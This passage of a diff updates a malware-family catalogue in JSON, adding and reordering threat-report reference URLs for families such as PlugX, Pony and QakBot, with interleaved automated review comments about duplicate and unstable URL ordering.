+ "https://go.contextis.com/rs/140-OCV-459/images/White%20Paper_PlugX%20-%20Payload%20Extraction.pdf",
+ "https://blog.xorhex.com/blog/mustangpandaplugx-2/",
+ "https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt",
 "https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn",
 "https://www.virusbulletin.com/virusbulletin/2020/05/vb2019-paper-apt-cases-exploiting-vulnerabilities-regionspecific-software/",
 "https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html",
- "https://blog.viettelcybersecurity.com/p1-chien-dich-cua-nhom-apt-trung-quoc-goblin-panda-tan-cong-vao-viet-nam-loi-dung-dai-dich-covid-19/",
- "https://www.secureworks.com/research/threat-profiles/bronze-firestone",
+ "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/",
 "https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html",
 "https://blog.vincss.net/2020/03/re012-phan-tich-ma-doc-loi-dung-dich-COVID-19-de-phat-tan-gia-mao-chi-thi-cua-thu-tuong-Nguyen-Xuan-Phuc-phan2.html",
- "http://blog.jpcert.or.jp/2017/02/plugx-poison-iv-919a.html",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-olive",
- "https://go.recordedfuture.com/hubfs/reports/cta-2020-0915.pdf",
- "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/",
- "http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html",
- "https://insights.oem.avira.com/new-wave-of-plugx-targets-hong-kong/",
- "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/",
- "https://securelist.com/apt-trends-report-q2-2020/97937/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/",
 "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
- "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf",
 "https://www.secureworks.com/research/bronze-president-targets-ngos",
- "https://countuponsecurity.com/2018/02/04/malware-analysis-plugx/",
- "https://www.trendmicro.com/en_us/research/21/a/xdr-investigation-uncovers-plugx-unique-technique-in-apt-attack.html",
- "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/",
- "http://blog.airbuscybersecurity.com/post/2014/01/plugx-some-uncovered-points.html",
- "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape",
- "https://www.zdnet.com/article/chinese-state-hackers-target-hong-kong-catholic-church/",
- "https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf",
+ "https://or10nlabs.tech/reverse-engineering-the-new-mustang-panda-plugx-downloader/",
 "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf",
- "https://threatrecon.nshc.net/2019/03/19/sectorm04-targeting-singapore-custom-malware-analysis/",
- "https://blog.ensilo.com/uncovering-new-activity-by-apt10",
- "http://www.talent-jump.com/article/2020/02/17/CLAMBLING-A-New-Backdoor-Base-On-Dropbox-en/",
- "https://www.secureworks.com/research/threat-profiles/bronze-riverside",
- "https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf",
- "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/",
+ "https://therecord.media/indonesian-intelligence-agency-compromised-in-suspected-chinese-hack/",
 "https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disguised-as-antivirus/",
- "https://silascutler.blogspot.com/2019/11/fresh-plugx-october-2019.html",
- "https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf",
- "https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://www.macnica.net/file/security_report_20160613.pdf",
- "https://securelist.com/time-of-death-connected-medicine/84315/",
+ "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia",
+ "https://twitter.com/xorhex/status/1399906601562165249?s=20",
 "https://www.bleepingcomputer.com/news/security/chinas-apt-hackers-move-to-ransomware-attacks/",
- "https://www.secureworks.com/research/threat-profiles/bronze-express",
 "https://www.secureworks.com/research/threat-profiles/bronze-woodland",
- "https://www.sophos.com/en-us/medialibrary/pdfs/technical%20papers/plugx-thenextgeneration.pdf",
- "https://securelist.com/apt-trends-report-q3-2020/99204/",
- "https://www.fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-",
- "https://www.lac.co.jp/lacwatch/people/20171218_001445.html",
 "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html",
- "https://www.contextis.com/de/blog/avivore",
- "https://www.us-cert.gov/ncas/alerts/TA17-117A",
- "https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report",
- "https://www.secureworks.com/research/threat-profiles/bronze-union",
- "https://twitter.com/stvemillertime/status/1261263000960450562",
 "https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/",
- "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage",
- "https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf",
 "https://risky.biz/whatiswinnti/",
- "https://lab52.io/blog/mustang-panda-recent-activity-dll-sideloading-trojans-with-temporal-c2-servers/",
- "https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html",
 "https://www.cyber.gov.au/sites/default/files/2019-03/msp_investigation_report.pdf",
- "https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader",
- "https://securelist.com/cycldek-bridging-the-air-gap/97157/",
- "https://countuponsecurity.com/2018/05/09/malware-analysis-plugx-part-2/",
- "https://www.secureworks.com/research/threat-profiles/bronze-keystone",
- "https://www.secureworks.com/research/threat-profiles/bronze-overbrook",
- "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf",
- "https://marcoramilli.com/2020/03/19/is-apt27-abusing-covid-19-to-attack-people/",
- "https://www.secureworks.com/research/threat-profiles/bronze-president"
+ "https://www.secureworks.com/research/threat-profiles/bronze-riverside",
+ "https://www.recordedfuture.com/chinese-group-calypso-exploiting-microsoft-exchange/",
+ "http://blog.jpcert.or.jp/2017/02/plugx-poison-iv-919a.html"
 ],
 "synonyms": [
 "Destroy RAT",
@@ -24334,6 +27785,7 @@
 "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/analysing-a-recent-poison-ivy-sample/",
 "https://lab52.io/blog/icefog-apt-group-abusing-recent-conflict-between-iran-and-eeuu/",
 "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html",
+ "https://www.recordedfuture.com/china-linked-ta428-threat-group",
 "https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology",
 "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-GuPan.pdf",
 "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/",
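Review bot: Most of the PlugX hunk is the same URLs changing position — `bronze-president`, `bronze-riverside`, the ESET Q2 2020 report and the Q2 2020 APT-trends report, among many others, are each removed from one spot and re-added in another — so the genuinely new references (the LuminousMoth, Operation Harvest and RedDelta write-ups, for example) are hard to pick out and to audit. If `refs` order carries no meaning in this galaxy, emitting the list sorted, or in stable insertion order, from the generator would reduce future diffs to true additions and removals. Worth noting too that the new list still carries both `http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html` and `https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html`, which by their paths look like one article and could be collapsed to a single entry.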
@@ -24350,11 +27802,13 @@
 "https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/",
 "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2011/the_nitro_attacks.pdf",
 "https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf",
+ "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf",
 "https://us-cert.cisa.gov/ncas/alerts/aa20-275a",
 "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
 "https://www.secureworks.com/research/threat-profiles/bronze-union",
 "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html",
 "https://www.secureworks.com/research/threat-profiles/bronze-firestone",
+ "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf",
 "https://www.secureworks.com/research/threat-profiles/bronze-riverside",
 "http://blogs.360.cn/post/APT_C_01_en.html"
 ],
@@ -24433,19 +27887,25 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.pony",
+ "http://www.secureworks.com/research/threat-profiles/gold-evergreen",
 "http://www.secureworks.com/research/threat-profiles/gold-essex",
+ "https://www.youtube.com/watch?v=y8Z9KnL8s8s",
 "https://www.youtube.com/watch?v=EyDiIAt__dI",
 "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
 "https://www.uperesia.com/analysis-of-a-packed-pony-downloader",
 "https://www.secureworks.com/research/threat-profiles/gold-evergreen",
 "https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/",
 "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://i.blackhat.com/asia-21/Thursday-Handouts/as21-Taniguchi-How-Did-The-Adversaries-Abusing-The-Bitcoin-Blockchain-Evade-Our-Takeover.pdf",
+ "https://www.secureworks.com/research/gold-galleon-how-a-nigerian-cyber-crew-plunders-the-shipping-industry",
 "https://int0xcc.svbtle.com/practical-threat-hunting-and-incidence-response-a-case-of-a-pony-malware-infection",
 "https://www.secureworks.com/research/threat-profiles/gold-galleon",
+ "http://www.secureworks.com/research/threat-profiles/gold-galleon",
 "https://www.mcafee.com/us/resources/reports/rp-quarterly-threats-jun-2017.pdf",
 "https://www.secureworks.com/research/threat-profiles/gold-essex",
- "https://github.com/nyx0/Pony"
+ "https://github.com/nyx0/Pony",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/"
 ],
 "synonyms": [
 "Fareit",
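Review bot: The added `http://www.secureworks.com/research/threat-profiles/gold-evergreen` and `http://www.secureworks.com/research/threat-profiles/gold-galleon` lines duplicate the `https://` forms of the same URLs already present in this Pony list, and the pre-existing `gold-essex` pair shows the same pattern, which suggests the de-duplication step compares URLs byte-for-byte. Dropping the two `http://` additions here, and normalising scheme (and ideally trailing slash) before de-duplicating in the generator, would keep one entry per source; the `https://` form is the one to keep for references to security vendors.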
@@ -24554,7 +28014,8 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.poslurp",
 "https://atr-blog.gigamon.com/2019/07/23/abadbabe-8badf00d-discovering-badhatch-and-a-detailed-look-at-fin8s-tooling/",
 "https://norfolkinfosec.com/fuel-pumps-ii-poslurp-b/",
- "https://twitter.com/just_windex/status/1162118585805758464"
+ "https://twitter.com/just_windex/status/1162118585805758464",
+ "https://www.root9b.com/sites/default/files/whitepapers/PoS%20Malware%20ShellTea%20PoSlurp.pdf"
 ],
 "synonyms": [
 "PUNCHTRACK"
@@ -24569,7 +28030,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.poulight_stealer",
+ "https://blog.360totalsecurity.com/en/a-txt-file-can-steal-all-your-secrets/?web_view=true",
 "https://www.carbonblack.com/blog/tau-threat-discovery-cryptocurrency-clipper-malware-evolves/",
+ "https://www.youtube.com/watch?v=MaPXDCq-Gf4",
 "https://twitter.com/MBThreatIntel/status/1240389621638402049?s=20"
 ],
 "synonyms": [
@@ -24580,6 +28043,19 @@
 "uuid": "e4bcb3e4-17f6-4786-a19b-255c48a07f9a",
 "value": "Poulight Stealer"
 },
+ {
+ "description": "According to Trend Micro, Povlsomware (Ransom.MSIL.POVLSOM.THBAOBA) is a proof-of-concept (POC) ransomware first released in November 2020 which, according to their Github page, is used to “securely” test the ransomware protection capabilities of security vendor products.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.povlsomware",
+ "https://www.trendmicro.com/en_us/research/21/c/povlsomware-ransomware-features-cobalt-strike-compatibility.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "632001f4-a313-4753-b876-f85df00bc387",
+ "value": "Povlsomware"
+ },
 {
 "description": "",
 "meta": {
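Review bot: The new Poulight ref `"https://blog.360totalsecurity.com/en/a-txt-file-can-steal-all-your-secrets/?web_view=true"` carries a presentation-only query string; `?web_view=true` is not part of the article's identity and will defeat exact-match de-duplication if the bare URL is added later, so store it as `"https://blog.360totalsecurity.com/en/a-txt-file-can-steal-all-your-secrets/"`. The same kind of share-tracking suffix (`?s=20`) is on the new Twitter refs in the Prometheus and PurpleFox hunks below. Stripping known tracking parameters in the generator would keep the list canonical.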
@@ -24614,6 +28090,7 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.powercat",
 "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/",
+ "https://www.cyborgsecurity.com/blog/you-dont-know-the-hafnium-of-it/",
 "https://twitter.com/VK_Intel/status/1141540229951709184"
 ],
 "synonyms": [],
@@ -24754,6 +28231,7 @@
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
 "https://securelist.com/a-predatory-tale/89779",
 "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
 "https://www.secureworks.com/research/threat-profiles/gold-galleon",
 "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf",
 "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware"
@@ -24806,6 +28284,20 @@
 "uuid": "0714a7ad-45cb-44ec-92f9-2e839fd8a6b8",
 "value": "PrincessLocker"
 },
+ {
+ "description": "Malware that abuses the Common Log File System (CLFS) to store/hide a second stage payload via registry transaction files.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.privatelog",
+ "https://twitter.com/ESETresearch/status/1433819369784610828",
+ "https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "41bd3db9-a6f2-49b4-966a-3c710827fa82",
+ "value": "PRIVATELOG"
+ },
 {
 "description": "",
 "meta": {
@@ -24819,6 +28311,25 @@
 "uuid": "d0c7815d-6039-436f-96ef-0767aabbdb36",
 "value": "Project Hook POS"
 },
+ {
+ "description": "Ransomware written in .NET, apparently derived from the codebase of win.hakbit (Thanos) ransomware.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.prometheus",
+ "https://www.cybereason.com/blog/cybereason-vs.-prometheus-ransomware",
+ "https://medium.com/cycraft/prometheus-decryptor-6933e7bac1ea",
+ "https://twitter.com/inversecos/status/1441252744258461699?s=20",
+ "https://medium.com/s2wlab/prometheus-x-spook-prometheus-ransomware-rebranded-spook-ransomware-6f93bd8ab5dd",
+ "https://therecord.media/decryptor-released-for-prometheus-ransomware-victims/",
+ "https://id-ransomware.blogspot.com/2021/05/prometheus-ransomware.html",
+ "https://unit42.paloaltonetworks.com/prometheus-ransomware/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "5b5f10bf-2bbe-4019-810c-69eba58ebc81",
+ "value": "Prometheus"
+ },
 {
 "description": "",
 "meta": {
@@ -24837,7 +28348,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.protonbot",
- "https://fumik0.com/2019/05/24/overview-of-proton-bot-another-loader-in-the-wild/"
+ "https://fumik0.com/2019/05/24/overview-of-proton-bot-another-loader-in-the-wild/",
+ "https://www.youtube.com/watch?v=FttiysUZmDw"
 ],
 "synonyms": [],
 "type": []
@@ -24988,8 +28500,15 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.purplefox",
+ "https://nao-sec.org/2021/04/exploit-kit-still-sharpens-a-sword.html",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell/",
+ "https://s.tencent.com/research/report/1322.html",
+ "https://www.trendmicro.com/en_us/research/21/g/purplefox-using-wpad-to-targent-indonesian-users.html",
+ "https://blog.malwarebytes.com/trojans/2021/03/perkiler-malware-turns-to-smb-brute-force-to-spread/",
+ "https://threatresearch.ext.hp.com/purple-fox-exploit-kit-now-exploits-cve-2021-26411/",
+ "https://twitter.com/C0rk1_H/status/1412801973628272641?s=20",
 "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/security-101-the-impact-of-cryptocurrency-mining-malware",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell/"
+ "https://www.guardicore.com/labs/purple-fox-rootkit-now-propagates-as-a-worm/"
 ],
 "synonyms": [],
 "type": []
@@ -25042,6 +28561,19 @@
 "uuid": "b0cb81bc-5d97-454a-8eee-4e81328c7228",
 "value": "Putabmow"
 },
+ {
+ "description": "The dropper module is used to install two executables that pretend to be legitimate files belonging to Microsoft Windows OS. One of these files (%SYSTEM%\\WmiPrvMon.exe) is registered as a service and is used as a launcher for the second executable. This second executable (%SYSTEM%\\wmimon.dll) has the functionality of a remote shell and can be considered the main payload of the attack. ",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.puzzlemaker",
+ "https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "2c835470-1bd2-4bd6-a83b-e9c3e12fa0ad",
+ "value": "puzzlemaker"
+ },
 {
 "description": "",
 "meta": {
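Review bot: The new puzzlemaker `description` ends with a trailing space (`…the main payload of the attack. "`) and its `value` is lowercase `"puzzlemaker"` while the neighbouring new entries use the vendor's casing (`"PRIVATELOG"`, `"Prometheus"`); trim the string and confirm the intended display name, since `value` is the field consumers match on and display. The backslashes in `%SYSTEM%\\WmiPrvMon.exe` and `%SYSTEM%\\wmimon.dll` are correctly escaped for JSON, so nothing needs to change there.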
@@ -25061,25 +28593,29 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.pwndlocker",
 "https://norfolkinfosec.com/tinypos-and-prolocker-an-odd-relationship/",
- "https://www.cert-pa.it/notizie/pwndlocker-si-rinnova-in-prolock-ransomware/",
- "https://soolidsnake.github.io/2020/05/11/Prolock_ransomware.html",
+ "https://www.bleepingcomputer.com/news/security/new-pwndlocker-ransomware-targeting-us-cities-enterprises/",
 "https://raw.githubusercontent.com/fboldewin/When-ransomware-hits-an-ATM-giant---The-Diebold-Nixdorf-case-dissected/main/When%20ransomware%20hits%20an%20ATM%20giant%20-%20The%20Diebold%20Nixdorf%20case%20dissected%20-%20Group-IB%20CyberCrimeCon2020.pdf",
 "https://www.intrinsec.com/egregor-prolock/",
- "https://www.zdnet.com/article/fbi-prolock-ransomware-gains-access-to-victim-networks-via-qakbot-infections/",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://id-ransomware.blogspot.com/2019/10/pwndlocker-ransomware.html",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
 "https://medium.com/s2wlab/operation-synctrek-e5013df8d167",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.bleepingcomputer.com/news/security/new-pwndlocker-ransomware-targeting-us-cities-enterprises/",
- "https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/",
- "https://www.group-ib.com/blog/prolock_evolution",
 "https://www.hornetsecurity.com/en/security-information/qakbot-malspam-leading-to-prolock/",
- "https://www.it-klinika.rs/blog/paznja-novi-opasni-ransomware-pwndlocker-i-u-srbiji",
- "https://news.sophos.com/en-us/2020/07/27/prolock-ransomware-gives-you-the-first-8-kilobytes-of-decryption-for-free/",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.bleepingcomputer.com/news/security/pwndlocker-ransomware-gets-pwned-decryption-now-available/",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
 "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/",
+ "https://soolidsnake.github.io/2020/05/11/Prolock_ransomware.html",
+ "https://news.sophos.com/en-us/2020/07/27/prolock-ransomware-gives-you-the-first-8-kilobytes-of-decryption-for-free/",
 "https://www.group-ib.com/blog/prolock",
- "https://www.bleepingcomputer.com/news/security/pwndlocker-ransomware-gets-pwned-decryption-now-available/"
+ "https://www.cert-pa.it/notizie/pwndlocker-si-rinnova-in-prolock-ransomware/",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
+ "https://id-ransomware.blogspot.com/2019/10/pwndlocker-ransomware.html",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
+ "https://www.group-ib.com/blog/prolock_evolution",
+ "https://www.zdnet.com/article/fbi-prolock-ransomware-gains-access-to-victim-networks-via-qakbot-infections/",
+ "https://www.it-klinika.rs/blog/paznja-novi-opasni-ransomware-pwndlocker-i-u-srbiji"
 ],
 "synonyms": [
 "ProLock"
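Review bot: Most of this hunk is churn rather than content: every removed ref (`cert-pa.it`, `soolidsnake`, the `zdnet` FBI article, `cronup`, `id-ransomware`, `crowdstrike`, `cisoclub`, `hornetsecurity`, `group-ib/blog/prolock_evolution`, `it-klinika`, `sophos`, the `bleepingcomputer` decryptor story) is re-added a few lines down, and only the `web.archive.org` copy of the cisoclub PDF, `cyborgsecurity`, `pwc` and `docs.google.com` entries are genuinely new. The Qadars, QakBot, Raccoon and RagnarLocker hunks have the same shape; emitting `refs` in a stable sorted order from the generator would keep such diffs reviewable and make an accidental drop visible. Separately, `"https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3"` (also added in the RagnarLocker hunk) is an editable shared document rather than a published report, so it can change or disappear silently; cite an archived snapshot alongside it, as this hunk already does for the cisoclub PDF.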
@@ -25184,10 +28720,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.qadars",
- "https://info.phishlabs.com/blog/dissecting-the-qadars-banking-trojan",
- "https://securityintelligence.com/an-analysis-of-the-qadars-trojan/",
- "https://www.johannesbader.ch/2016/04/the-dga-of-qadars/",
 "https://securityintelligence.com/meanwhile-britain-qadars-v3-hardens-evasion-targets-18-uk-banks/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://securityintelligence.com/an-analysis-of-the-qadars-trojan/",
+ "https://info.phishlabs.com/blog/dissecting-the-qadars-banking-trojan",
+ "https://www.johannesbader.ch/2016/04/the-dga-of-qadars/",
 "https://www.welivesecurity.com/2013/12/18/qadars-a-banking-trojan-with-the-netherlands-in-its-sights/"
 ],
 "synonyms": [],
@@ -25201,64 +28738,100 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://www.varonis.com/blog/varonis-discovers-global-cyber-campaign-qbot/",
+ "https://research.checkpoint.com/2020/exploring-qbots-latest-attack-methods/",
+ "https://quosecgmbh.github.io/blog/grap_qakbot_strings.html",
+ "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89",
+ "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf",
+ "https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/",
+ "https://blog.talosintelligence.com/2019/05/qakbot-levels-up-with-new-obfuscation.html",
+ "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf",
+ "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-countermeasures/",
+ "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2020-1203.pdf",
+ "https://cybersecurity.att.com/blogs/labs-research/the-rise-of-qakbot",
 "https://raw.githubusercontent.com/fboldewin/When-ransomware-hits-an-ATM-giant---The-Diebold-Nixdorf-case-dissected/main/When%20ransomware%20hits%20an%20ATM%20giant%20-%20The%20Diebold%20Nixdorf%20case%20dissected%20-%20Group-IB%20CyberCrimeCon2020.pdf",
- "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/",
- "https://blog.quosec.net/posts/grap_qakbot_navigation/",
 "https://www.hornetsecurity.com/en/security-information/qakbot-malspam-leading-to-prolock/",
 "https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7",
 "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf",
- "https://blog.morphisec.com/qakbot-qbot-maldoc-two-new-techniques",
- "https://research.checkpoint.com/2020/exploring-qbots-latest-attack-methods/",
- "https://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-1/",
- "https://media.scmagazine.com/documents/225/bae_qbot_report_56053.pdf",
- "https://twitter.com/redcanary/status/1334224861628039169",
- "https://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-3/",
- "https://web.archive.org/web/20201207094648/https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Egregor_Ransomware.pdf",
- "https://www.vkremez.com/2018/07/lets-learn-in-depth-reversing-of-qakbot.html",
- "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware",
- "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf",
- "https://n1ght-w0lf.github.io/malware%20analysis/qbot-banking-trojan/",
- "https://www.cylance.com/en_us/blog/threat-spotlight-the-return-of-qakbot-malware.html",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://www.varonis.com/blog/varonis-discovers-global-cyber-campaign-qbot/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://www.group-ib.com/blog/egregor",
- "https://www.intrinsec.com/egregor-prolock/",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://malwareandstuff.com/upnp-messing-up-security-since-years/",
- "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89",
- "https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/",
